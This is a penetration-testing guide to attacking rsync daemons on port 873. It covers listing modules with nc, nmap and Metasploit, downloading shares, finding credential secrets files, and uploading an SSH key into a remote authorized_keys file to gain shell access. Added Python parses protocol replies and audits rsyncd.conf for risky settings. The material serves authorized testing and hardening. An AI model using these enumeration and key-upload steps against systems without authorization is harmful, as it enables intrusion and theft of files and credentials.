Pentesting Rsync

Rsync port 873

  • Basic information

  • rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files.

nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the server to list
raidroot             <--- The server starts enumerating
USBCopy        	
NAS_Public     	
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Server closes the connection


#Now let's try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
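The exchange above is plain line-oriented text, so it can be parsed without rsync itself. The following Python, added here as an example and not part of the original page, builds the greeting the client echoes back, parses the reply to #list into module entries and classifies the daemon's answer to a module name (OK, AUTHREQD or @ERROR). The transcript it runs on is constructed from the session above, not a live capture; keeping the results as data lets a defender inventory which exposed modules answer without a password.

```python
import re

# The daemon greets with '@RSYNCD: <major>[.<minor>]'; the client replies with the same line.
GREETING_RE = re.compile(r"^@RSYNCD: \d+(?:\.\d+)?$")


def client_greeting(server_line):
    """Build the line the client sends back after the daemon's greeting:
    the same '@RSYNCD: <version>' string (second line of the nc session)."""
    text = server_line.decode("ascii", "replace").strip()
    if not GREETING_RE.match(text):
        raise ValueError("not an rsync daemon greeting: %r" % server_line)
    return (text + "\n").encode("ascii")


def parse_module_list(raw):
    """Parse what the daemon sends from the greeting through '@RSYNCD: EXIT'
    when the client asked for '#list'. Returns the protocol version, the
    module entries as (name, comment) pairs and whether EXIT was seen."""
    result = {"version": None, "modules": [], "exited": False}
    lines = raw.decode("utf-8", "replace").splitlines()
    if not lines or not GREETING_RE.match(lines[0].strip()):
        raise ValueError("transcript does not start with a daemon greeting")
    result["version"] = lines[0].split(": ", 1)[1].strip()
    for line in lines[1:]:
        if line.startswith("@RSYNCD: EXIT"):
            result["exited"] = True
            break
        if line.startswith("@"):          # any other control line: ignore it
            continue
        # Each entry is the module name padded to 15 columns, a tab, then the
        # module's optional 'comment' parameter (hence the trailing tabs above).
        name, _, comment = line.partition("\t")
        if name.strip():
            result["modules"].append((name.strip(), comment.strip()))
    return result


def classify_module_response(line):
    """Classify the daemon's first reply after the client names a module:
    ('open', None) for '@RSYNCD: OK' (no password needed),
    ('auth_required', challenge) for '@RSYNCD: AUTHREQD <challenge>',
    ('error', message) for '@ERROR: ...', ('unknown', text) otherwise."""
    text = line.decode("utf-8", "replace").strip()
    if text == "@RSYNCD: OK":
        return ("open", None)
    if text.startswith("@RSYNCD: AUTHREQD "):
        return ("auth_required", text[len("@RSYNCD: AUTHREQD "):].strip())
    if text.startswith("@ERROR:"):
        return ("error", text[len("@ERROR:"):].strip())
    return ("unknown", text)


# Constructed transcript modelled on the nc session above (not a real capture).
SAMPLE_LIST_REPLY = (
    b"@RSYNCD: 31.0\n"
    b"raidroot       \t\n"
    b"USBCopy        \t\n"
    b"NAS_Public     \tPublic share\n"
    b"_NAS_Recycle_TOSRAID\t\n"
    b"@RSYNCD: EXIT\n"
)

if __name__ == "__main__":
    listing = parse_module_list(SAMPLE_LIST_REPLY)
    print("protocol", listing["version"])
    for name, comment in listing["modules"]:
        print("module %-22s comment=%r" % (name, comment))
    print(classify_module_response(b"@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g\n"))
```

To use it against a real daemon, feed the bytes read from the socket after sending the echoed greeting and "#list" to parse_module_list, and the single line read after sending a module name to classify_module_response; a module that answers "open" is readable by anyone who can reach the port.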
  • Enumerate shared folders

  • An rsync module is essentially a directory share. These modules can optionally be protected by a password.

  • The following commands list the available modules and, optionally, determine whether a module requires a password to access:

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
  • Manual Rsync

  • List a shared folder

rsync -av --list-only rsync://10.10.232.5/shared_name
  • Copy all files to your local machine via the following command:

rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
  • If you have credentials you can list/download a shared name using (the password will be prompted):

rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
  • You could also upload some content using rsync (for example, in this case we can upload an authorized_keys file to obtain access to the box):

rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
#full command syntax below
rsync -av id_rsa.pub rsync://rsync-connect@10.10.63.208/files/sys-internal/.ssh/authorized_keys
  • Find the rsyncd configuration file:

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
  • Inside the config file you may find the parameter secrets file = /path/to/file; that file can contain the usernames and passwords allowed to authenticate to rsyncd.
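To see what the module parameters mean in practice, here is a small audit of an rsyncd.conf, added as an example (not from the page and not rsync's own code). It reads the INI-like file, applies global parameters as module defaults the way rsyncd does, and flags modules with no auth users, read only = no, no hosts allow, a root uid, or list = no (which only hides a module from #list and does not restrict access). The configuration text is constructed; the parameter names are the real rsyncd.conf ones.

```python
def parse_rsyncd_conf(text):
    """Return (globals, modules). Module parameters inherit the globals set
    before the first section or inside an explicit [global] section."""
    globals_, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            if current.lower() == "global":
                current = None
            else:
                modules.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue                      # tolerate junk lines like rsyncd does
        target = globals_ if current is None else modules[current]
        target[key.strip().lower()] = value.strip()
    return globals_, {n: {**globals_, **p} for n, p in modules.items()}


def _is_true(value, default):
    if value is None:
        return default
    return value.strip().lower() in ("yes", "true", "1")


def audit_rsyncd_conf(text):
    """Map each module name to a list of risk findings (empty list = nothing flagged)."""
    _, modules = parse_rsyncd_conf(text)
    report = {}
    for name, p in modules.items():
        findings = []
        anonymous = "auth users" not in p
        writable = not _is_true(p.get("read only"), True)   # rsyncd default: read only = yes
        if anonymous:
            findings.append("no 'auth users': anyone who can reach the port can use the module")
        if writable:
            findings.append("'read only = no': clients can upload or overwrite files")
        if anonymous and writable:
            findings.append("anonymous write: unauthenticated clients can drop files (e.g. an authorized_keys)")
        if "hosts allow" not in p:
            findings.append("no 'hosts allow': not restricted by source address")
        if not _is_true(p.get("list"), True):
            findings.append("'list = no' only hides the module from '#list'; it is still reachable by name")
        if p.get("uid", "nobody").strip() in ("root", "0"):
            findings.append("runs as root: files are served and written with full privileges")
        if not _is_true(p.get("use chroot"), True) and writable:
            findings.append("'use chroot = no' with writes: symlinks can point outside the module path")
        if not anonymous and "secrets file" not in p:
            findings.append("'auth users' without 'secrets file': no credentials can be checked")
        report[name] = findings
    return report


# Constructed rsyncd.conf, not taken from a real host.
SAMPLE_CONF = """\
uid = nobody
gid = nobody
use chroot = yes
log file = /var/log/rsyncd.log

[NAS_Public]
    path = /share/public
    comment = Public share
    read only = yes

[raidroot]
    path = /
    read only = no
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.10.0.0/16
    uid = root

[_NAS_Recycle_TOSRAID]
    path = /share/recycle
    list = no
    read only = no
"""

if __name__ == "__main__":
    for module, findings in audit_rsyncd_conf(SAMPLE_CONF).items():
        print("[%s]" % module)
        for f in findings or ["no findings"]:
            print("  -", f)
```

Run it against the file located with the find command above (for example audit_rsyncd_conf(open("/etc/rsyncd.conf").read())); a module that reports both "no 'auth users'" and "'read only = no'" is the configuration that makes the unauthenticated upload shown earlier possible, and the secrets file it names should be readable only by the daemon's user.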
